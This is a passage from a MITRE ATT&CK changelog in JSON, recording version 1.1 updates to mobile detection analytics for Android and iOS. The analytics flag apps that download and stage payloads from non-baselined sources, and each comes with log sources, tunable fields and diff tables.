                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to102__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to102__0\"><a href=\"#difflib_chg_to102__top\">t</a></td><td class=\"diff_header\" id=\"from102_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">This&nbsp;is&nbsp;abuse&nbsp;of&nbsp;standard&nbsp;OS-level&nbsp;APIs&nbsp;and&nbsp;are&nbsp;therefore&nbsp;ty</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to102__top\">t</a></td><td class=\"diff_header\" id=\"to102_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">The&nbsp;defender&nbsp;correlates&nbsp;application&nbsp;loading&nbsp;or&nbsp;invoking&nbsp;nati</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">pically&nbsp;undetectable&nbsp;to&nbsp;the&nbsp;end&nbsp;user.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ve&nbsp;libraries&nbsp;through&nbsp;JNI&nbsp;or&nbsp;NDK-backed&nbsp;execution&nbsp;paths&nbsp;with&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">subsequent&nbsp;lower-level&nbsp;activity&nbsp;such&nbsp;as&nbsp;native&nbsp;thread&nbsp;creati</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">on,&nbsp;sensor&nbsp;access,&nbsp;file&nbsp;operations,&nbsp;or&nbsp;outbound&nbsp;network&nbsp;comm</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">unication&nbsp;that&nbsp;is&nbsp;inconsistent&nbsp;with&nbsp;the&nbsp;app's&nbsp;declared&nbsp;role&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">or&nbsp;recent&nbsp;user&nbsp;interaction.&nbsp;The&nbsp;analytic&nbsp;prioritizes&nbsp;defende</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">r-observable&nbsp;control-plane&nbsp;effects:&nbsp;native&nbsp;library&nbsp;load&nbsp;or&nbsp;J</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">NI&nbsp;bridge&nbsp;use,&nbsp;transition&nbsp;into&nbsp;native&nbsp;execution&nbsp;context,&nbsp;and</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;immediate&nbsp;post-load&nbsp;behavior&nbsp;occurring&nbsp;from&nbsp;background&nbsp;stat</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">e,&nbsp;locked-device&nbsp;state,&nbsp;or&nbsp;non-baselined&nbsp;app&nbsp;categories.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--86aa8777-e12a-4dab-81ed-354bed18f3db",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-09 15:57:30.214000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0718#AN1848",
                            "external_id": "AN1848"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1848",
                    "description": "The defender correlates an application establishing outbound retrieval to a non-baselined external source with immediate local creation of a new executable, module, staged payload, overlay asset, or secondary file in app-controlled or shared storage, followed by optional load, invocation, handoff, or repeat retrieval behavior. The analytic prioritizes Android-observable effects: network download activity, DownloadManager or direct HTTP retrieval, file creation in package-specific or external paths, and execution context inconsistent with recent user interaction or the app\u2019s declared role.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "NSM:Flow",
                            "channel": "Application retrieves remote content from non-baselined domain or IP and the transfer direction is inbound to device during the file acquisition phase"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "Application invokes direct file retrieval, DownloadManager usage, or streaming write from network response to local storage immediately after remote session establishment"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
                            "name": "MobileEDR:telemetry",
                            "channel": "Application writes newly retrieved binary, archive, script-like asset, overlay content, library, or opaque payload to app-private, cache, temp, or shared external path as the primary local effect of transfer"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "Ingress transfer and local file creation occur while app_state=background or device_locked=true or recent_user_interaction=false during the acquisition phase"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "Managed app without approved content-download, update, browser, or file-sync role performs remote payload retrieval and local tool staging"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window between remote retrieval, local write, and any follow-on load or transfer completion"
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Apps legitimately expected to download files such as browsers, enterprise app stores, backup/sync tools, or content delivery apps"
                        },
                        {
                            "field": "AllowedDestinationList",
                            "description": "Approved software distribution, CDN, MDM, and enterprise update endpoints"
                        },
                        {
                            "field": "AllowedPathList",
                            "description": "Expected local download, cache, and update paths for legitimate app behavior"
                        },
                        {
                            "field": "IngressBytesThreshold",
                            "description": "Minimum inbound transfer size consistent with a staged secondary tool or payload"
                        },
                        {
                            "field": "ForegroundStateRequired",
                            "description": "Whether file retrieval should occur only during active user-driven workflows"
                        },
                        {
                            "field": "FileTypeRiskPatterns",
                            "description": "Environment-specific set of retrieved file classes considered suspicious such as apk, dex, jar, so, zip, html overlay, or opaque blob"
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window between remote retrieval, local write, and any follow-on load or transfer completion\"}, {\"field\": \"AllowedAppList\", \"description\": \"Apps legitimately expected to download files such as browsers, enterprise app stores, backup/sync tools, or content delivery apps\"}, {\"field\": \"AllowedDestinationList\", \"description\": \"Approved software distribution, CDN, MDM, and enterprise update endpoints\"}, {\"field\": \"AllowedPathList\", \"description\": \"Expected local download, cache, and update paths for legitimate app behavior\"}, {\"field\": \"IngressBytesThreshold\", \"description\": \"Minimum inbound transfer size consistent with a staged secondary tool or payload\"}, {\"field\": \"ForegroundStateRequired\", \"description\": \"Whether file retrieval should occur only during active user-driven workflows\"}, {\"field\": \"FileTypeRiskPatterns\", \"description\": \"Environment-specific set of retrieved file classes considered suspicious such as apk, dex, jar, so, zip, html overlay, or opaque blob\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-09 15:57:30.214000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"The defender correlates an application establishing outbound retrieval to a non-baselined external source with immediate local creation of a new executable, module, staged payload, overlay asset, or secondary file in app-controlled or shared storage, followed by optional load, invocation, handoff, or repeat retrieval behavior. The analytic prioritizes Android-observable effects: network download activity, DownloadManager or direct HTTP retrieval, file creation in package-specific or external paths, and execution context inconsistent with recent user interaction or the app\\u2019s declared role.\", \"old_value\": \"Application vetting services could look for connections to unknown domains or IP addresses. \\nApplication vetting services may indicate precisely what content was requested during application execution.\", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1 @@\\n-Application vetting services could look for connections to unknown domains or IP addresses. \\n-Application vetting services may indicate precisely what content was requested during application execution.\\n+The defender correlates an application establishing outbound retrieval to a non-baselined external source with immediate local creation of a new executable, module, staged payload, overlay asset, or secondary file in app-controlled or shared storage, followed by optional load, invocation, handoff, or repeat retrieval behavior. The analytic prioritizes Android-observable effects: network download activity, DownloadManager or direct HTTP retrieval, file creation in package-specific or external paths, and execution context inconsistent with recent user interaction or the app\\u2019s declared role.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"NSM:Flow\", \"channel\": \"Application retrieves remote content from non-baselined domain or IP and the transfer direction is inbound to device during the file acquisition phase\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--764ee29e-48d6-4934-8e6b-7a606aaaafc0\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Application invokes direct file retrieval, DownloadManager usage, or streaming write from network response to local storage immediately after remote session establishment\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Application writes newly retrieved binary, archive, script-like asset, overlay content, library, or opaque payload to app-private, cache, temp, or shared external path as the primary local effect of transfer\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Ingress transfer and local file creation occur while app_state=background or device_locked=true or recent_user_interaction=false during the acquisition phase\"}, \"root['x_mitre_log_source_references'][4]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"Managed app without approved content-download, update, browser, or file-sync role performs remote payload retrieval and local tool staging\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to191__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to191__0\"><a href=\"#difflib_chg_to191__top\">t</a></td><td class=\"diff_header\" id=\"from191_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Application&nbsp;vetting&nbsp;services&nbsp;could&nbsp;look&nbsp;for&nbsp;connections&nbsp;to&nbsp;u</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to191__top\">t</a></td><td class=\"diff_header\" id=\"to191_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">The&nbsp;defender&nbsp;correlates&nbsp;an&nbsp;application&nbsp;establishing&nbsp;outbound</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">nknown&nbsp;domains&nbsp;or&nbsp;IP&nbsp;addresses.&nbsp;&nbsp;Application&nbsp;vetting&nbsp;service</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;retrieval&nbsp;to&nbsp;a&nbsp;non-baselined&nbsp;external&nbsp;source&nbsp;with&nbsp;immediate</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">s&nbsp;may&nbsp;indicate&nbsp;precisely&nbsp;what&nbsp;content&nbsp;was&nbsp;requested&nbsp;during&nbsp;a</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;local&nbsp;creation&nbsp;of&nbsp;a&nbsp;new&nbsp;executable,&nbsp;module,&nbsp;staged&nbsp;payload,</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">pplication&nbsp;execution.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;overlay&nbsp;asset,&nbsp;or&nbsp;secondary&nbsp;file&nbsp;in&nbsp;app-controlled&nbsp;or&nbsp;share</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">d&nbsp;storage,&nbsp;followed&nbsp;by&nbsp;optional&nbsp;load,&nbsp;invocation,&nbsp;handoff,&nbsp;o</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">r&nbsp;repeat&nbsp;retrieval&nbsp;behavior.&nbsp;The&nbsp;analytic&nbsp;prioritizes&nbsp;Androi</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">d-observable&nbsp;effects:&nbsp;network&nbsp;download&nbsp;activity,&nbsp;DownloadMan</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ager&nbsp;or&nbsp;direct&nbsp;HTTP&nbsp;retrieval,&nbsp;file&nbsp;creation&nbsp;in&nbsp;package-spec</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ific&nbsp;or&nbsp;external&nbsp;paths,&nbsp;and&nbsp;execution&nbsp;context&nbsp;inconsistent&nbsp;w</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ith&nbsp;recent&nbsp;user&nbsp;interaction&nbsp;or&nbsp;the&nbsp;app\u2019s&nbsp;declared&nbsp;role.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--d7e3296a-9f95-4061-b3f5-0f02910745ab",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-09 16:02:15.040000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0718#AN1849",
                            "external_id": "AN1849"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1849",
                    "description": "The defender correlates managed-app network retrieval from a non-baselined external source with immediate creation of a new local artifact, staged resource, module-like file, or opaque payload inside the app container, followed by optional dynamic loading, handoff, or repeat retrieval behavior. Because iOS offers weaker direct visibility into tool staging internals than Android in many environments, the analytic anchors first on network acquisition plus managed app identity and then strengthens confidence with file creation or process-activity effects where mobile telemetry is available.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "NSM:Flow",
                            "channel": "Managed iOS app retrieves remote content from non-baselined domain or IP with inbound payload transfer during the acquisition phase"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
                            "name": "MobileEDR:telemetry",
                            "channel": "Managed app writes newly retrieved container-local asset, dylib-like resource, archive, or opaque payload shortly after remote retrieval as the strongest local effect"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "Managed app performs post-download unpacking, dynamic resource handling, or module preparation immediately after local payload creation"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "Ingress retrieval and staging occur while app_state=background or device_locked=true or recent_user_interaction=false during the acquisition phase"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "iOS:MDMLog",
                            "channel": "Supervised managed app without approved update, browser, sync, or enterprise-content role retrieves and stages secondary content inconsistent with policy baseline"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window between remote retrieval, local staging, and any follow-on file handling"
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Managed apps legitimately expected to download secondary content or updates"
                        },
                        {
                            "field": "AllowedDestinationList",
                            "description": "Approved content, MDM, enterprise, and application-update endpoints"
                        },
                        {
                            "field": "AllowedContainerPatterns",
                            "description": "Expected app-container paths for legitimate downloaded assets"
                        },
                        {
                            "field": "IngressBytesThreshold",
                            "description": "Minimum inbound transfer volume consistent with secondary tool or payload retrieval"
                        },
                        {
                            "field": "ForegroundStateRequired",
                            "description": "Whether retrieval should happen only in active user-driven workflows"
                        },
                        {
                            "field": "ArtifactRiskPatterns",
                            "description": "Environment-specific file or content patterns considered suspicious such as staged dylib-like resources, html overlays, archives, or opaque blobs"
                        }
                    ],
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window between remote retrieval, local staging, and any follow-on file handling\"}, {\"field\": \"AllowedAppList\", \"description\": \"Managed apps legitimately expected to download secondary content or updates\"}, {\"field\": \"AllowedDestinationList\", \"description\": \"Approved content, MDM, enterprise, and application-update endpoints\"}, {\"field\": \"AllowedContainerPatterns\", \"description\": \"Expected app-container paths for legitimate downloaded assets\"}, {\"field\": \"IngressBytesThreshold\", \"description\": \"Minimum inbound transfer volume consistent with secondary tool or payload retrieval\"}, {\"field\": \"ForegroundStateRequired\", \"description\": \"Whether retrieval should happen only in active user-driven workflows\"}, {\"field\": \"ArtifactRiskPatterns\", \"description\": \"Environment-specific file or content patterns considered suspicious such as staged dylib-like resources, html overlays, archives, or opaque blobs\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-09 16:02:15.040000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"The defender correlates managed-app network retrieval from a non-baselined external source with immediate creation of a new local artifact, staged resource, module-like file, or opaque payload inside the app container, followed by optional dynamic loading, handoff, or repeat retrieval behavior. Because iOS offers weaker direct visibility into tool staging internals than Android in many environments, the analytic anchors first on network acquisition plus managed app identity and then strengthens confidence with file creation or process-activity effects where mobile telemetry is available.\", \"old_value\": \"Application vetting services could look for connections to unknown domains or IP addresses. \\nApplication vetting services may indicate precisely what content was requested during application execution.\", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1 @@\\n-Application vetting services could look for connections to unknown domains or IP addresses. \\n-Application vetting services may indicate precisely what content was requested during application execution.\\n+The defender correlates managed-app network retrieval from a non-baselined external source with immediate creation of a new local artifact, staged resource, module-like file, or opaque payload inside the app container, followed by optional dynamic loading, handoff, or repeat retrieval behavior. Because iOS offers weaker direct visibility into tool staging internals than Android in many environments, the analytic anchors first on network acquisition plus managed app identity and then strengthens confidence with file creation or process-activity effects where mobile telemetry is available.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"NSM:Flow\", \"channel\": \"Managed iOS app retrieves remote content from non-baselined domain or IP with inbound payload transfer during the acquisition phase\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--764ee29e-48d6-4934-8e6b-7a606aaaafc0\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Managed app writes newly retrieved container-local asset, dylib-like resource, archive, or opaque payload shortly after remote retrieval as the strongest local effect\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Managed app performs post-download unpacking, dynamic resource handling, or module preparation immediately after local payload creation\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Ingress retrieval and staging occur while app_state=background or device_locked=true or recent_user_interaction=false during the acquisition phase\"}, \"root['x_mitre_log_source_references'][4]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"iOS:MDMLog\", \"channel\": \"Supervised managed app without approved update, browser, sync, or enterprise-content role retrieves and stages secondary content inconsistent with policy baseline\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to151__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to151__0\"><a href=\"#difflib_chg_to151__top\">t</a></td><td class=\"diff_header\" id=\"from151_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Application&nbsp;vetting&nbsp;services&nbsp;could&nbsp;look&nbsp;for&nbsp;connections&nbsp;to&nbsp;u</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to151__top\">t</a></td><td class=\"diff_header\" id=\"to151_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">The&nbsp;defender&nbsp;correlates&nbsp;managed-app&nbsp;network&nbsp;retrieval&nbsp;from&nbsp;a</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">nknown&nbsp;domains&nbsp;or&nbsp;IP&nbsp;addresses.&nbsp;&nbsp;Application&nbsp;vetting&nbsp;service</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;non-baselined&nbsp;external&nbsp;source&nbsp;with&nbsp;immediate&nbsp;creation&nbsp;of&nbsp;a&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">s&nbsp;may&nbsp;indicate&nbsp;precisely&nbsp;what&nbsp;content&nbsp;was&nbsp;requested&nbsp;during&nbsp;a</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">new&nbsp;local&nbsp;artifact,&nbsp;staged&nbsp;resource,&nbsp;module-like&nbsp;file,&nbsp;or&nbsp;op</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">pplication&nbsp;execution.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">aque&nbsp;payload&nbsp;inside&nbsp;the&nbsp;app&nbsp;container,&nbsp;followed&nbsp;by&nbsp;optional&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">dynamic&nbsp;loading,&nbsp;handoff,&nbsp;or&nbsp;repeat&nbsp;retrieval&nbsp;behavior.&nbsp;Beca</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">use&nbsp;iOS&nbsp;offers&nbsp;weaker&nbsp;direct&nbsp;visibility&nbsp;into&nbsp;tool&nbsp;staging&nbsp;in</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ternals&nbsp;than&nbsp;Android&nbsp;in&nbsp;many&nbsp;environments,&nbsp;the&nbsp;analytic&nbsp;anch</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ors&nbsp;first&nbsp;on&nbsp;network&nbsp;acquisition&nbsp;plus&nbsp;managed&nbsp;app&nbsp;identity&nbsp;a</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">nd&nbsp;then&nbsp;strengthens&nbsp;confidence&nbsp;with&nbsp;file&nbsp;creation&nbsp;or&nbsp;process</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td 